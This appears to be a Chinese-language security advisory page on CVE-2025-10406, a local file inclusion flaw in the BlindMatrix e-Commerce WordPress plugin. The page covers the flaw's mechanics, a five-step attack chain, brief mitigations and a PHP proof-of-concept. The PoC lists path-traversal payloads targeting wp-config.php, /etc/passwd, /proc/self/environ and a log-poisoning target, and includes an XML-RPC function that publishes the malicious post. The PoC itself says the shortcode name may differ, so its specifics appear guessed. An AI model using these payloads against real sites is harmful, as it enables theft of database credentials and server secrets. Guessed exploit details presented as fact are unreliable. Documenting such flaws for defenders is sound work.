CVE-2025-10406：BlindMatrix电商WordPress插件LFI漏洞

漏洞信息

漏洞编号

CVE-2025-10406

漏洞类型

本地文件包含（LFI）

CVSS评分

5.5 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

BlindMatrix e-Commerce WordPress插件

漏洞概述

CVE-2025-10406是BlindMatrix e-Commerce WordPress插件中存在的一个本地文件包含（Local File Inclusion, LFI）漏洞。该漏洞影响3.1版本之前的所有BlindMatrix e-Commerce插件。该插件是一款用于WordPress的电商解决方案，为用户提供在线商店搭建功能。

该漏洞的核心问题在于插件未对shortcode（短代码）属性进行充分的验证和过滤，就直接将其用于生成文件路径并传递给PHP的include函数。由于WordPress的shortcode机制允许在文章或页面中嵌入动态内容，攻击者可以通过构造特殊的shortcode属性值，利用路径遍历（Path Traversal）技术，包含服务器上的任意文件。

此漏洞的CVSS评分为5.5，属于中危级别。虽然需要高权限认证（PR:H）才能利用，但任何具有贡献者（Contributor）级别及以上权限的认证用户均可触发此漏洞。攻击者可以通过此漏洞读取服务器上的敏感文件，如WordPress配置文件（wp-config.php），从而获取数据库凭证等关键信息。漏洞的发现者为WPScan团队，该漏洞已于2025年10月15日公开披露。

技术细节

该漏洞的技术原理基于PHP的本地文件包含（LFI）机制。BlindMatrix e-Commerce插件在处理shortcode时，会从shortcode属性中提取参数值，然后将这些值拼接到文件路径中，最后通过PHP的include或require函数加载目标文件。

具体而言，插件中的某个shortcode处理函数没有对用户可控的属性值进行适当的过滤和验证。例如，当插件处理类似[blindmatrix_template file='xxx']这样的shortcode时，它会直接将file属性的值拼接到路径中，形成类似include('templates/' . $file . '.php')的调用。

攻击者可以利用路径遍历序列（../）绕过目录限制，例如构造file='../../../wp-config.php'，使得最终的包含路径变为'templates/../../../wp-config.php'，从而包含WordPress的核心配置文件。由于include函数在遇到非PHP文件时会直接输出其内容（除非文件本身包含PHP代码），攻击者可以通过精心构造的payload读取服务器上的敏感文件内容。

利用此漏洞的前提条件是攻击者必须拥有有效的WordPress账户，且至少具有Contributor级别的权限。这是因为WordPress的shortcode通常在文章内容中渲染，而Contributor级别以上的用户才被允许发布文章内容。

攻击链分析

STEP 1

步骤1：获取认证账户

攻击者首先需要获取一个具有Contributor（贡献者）级别或更高权限的WordPress账户。这可以通过注册新账户（如果网站开放注册）、社会工程学或购买凭证等方式实现。

STEP 2

步骤2：构造恶意Shortcode

攻击者构造包含路径遍历序列的恶意shortcode，例如使用'../../'序列绕过目录限制，目标是读取服务器上的敏感文件如wp-config.php。

STEP 3

步骤3：发布包含恶意Shortcode的文章

攻击者通过WordPress后台创建新文章，将恶意shortcode嵌入文章内容中，然后发布或预览文章以触发shortcode的渲染。

STEP 4

步骤4：触发文件包含

当文章被访问或预览时，插件处理shortcode时未验证文件路径，直接将其传递给include函数，导致服务器上的目标文件被包含并执行或输出其内容。

STEP 5

步骤5：提取敏感信息

攻击者通过查看渲染后的页面内容，获取目标文件的内容，如数据库凭证、API密钥等敏感信息，进一步利用这些信息进行更深层次的攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2025-10406 - BlindMatrix e-Commerce WordPress Plugin LFI PoC
 * 
 * This PoC demonstrates how an authenticated user with Contributor
 * privileges can exploit the Local File Inclusion vulnerability
 * in the BlindMatrix e-Commerce WordPress plugin (versions < 3.1).
 *
 * Usage:
 * 1. Login to WordPress as a Contributor or higher
 * 2. Create a new post with the malicious shortcode
 * 3. Preview or publish the post to trigger the LFI
 */

// Malicious shortcode to be embedded in a WordPress post
$malicious_shortcode = '[blindmatrix_template file="../../../../wp-config.php"]';

// Alternative payloads for different file targets
$payloads = array(
    '[blindmatrix_template file="../../../../wp-config.php"]',          // WordPress config
    '[blindmatrix_template file="../../../../etc/passwd"]',              // System passwd file
    '[blindmatrix_template file="../../../../proc/self/environ"]',       // Environment variables
    '[blindmatrix_template file="../../../../var/log/apache2/access.log"]', // Log poisoning target
);

// Example: Using WordPress XML-RPC to create a post with the malicious shortcode
function exploit_lfi($wp_url, $username, $password, $shortcode) {
    $xmlrpc_url = $wp_url . '/xmlrpc.php';
    
    $request = xmlrpc_encode_request('wp.newPost', array(
        1,
        $username,
        $password,
        array(
            'post_title'   => 'Test Post',
            'post_content' => $shortcode,
            'post_status'  => 'publish',
            'post_author'  => 1
        )
    ));
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $xmlrpc_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $response = curl_exec($ch);
    curl_close($ch);
    
    return $response;
}

// Note: The actual shortcode name and attribute may vary.
// Researchers should verify the exact shortcode used by the plugin.
echo "PoC for CVE-2025-10406\n";
echo "Insert this shortcode in a WordPress post as a Contributor:\n";
echo $malicious_shortcode . "\n";
?>

影响范围

BlindMatrix e-Commerce < 3.1

防御指南

临时缓解措施

在无法立即升级插件的情况下，建议采取以下临时缓解措施：1）限制Contributor级别用户的注册和文章发布权限；2）在wp-config.php中设置敏感文件的访问权限；3）部署WAF规则过滤包含'../'等路径遍历特征的请求；4）监控异常的文件访问日志，及时发现潜在的LFI攻击行为。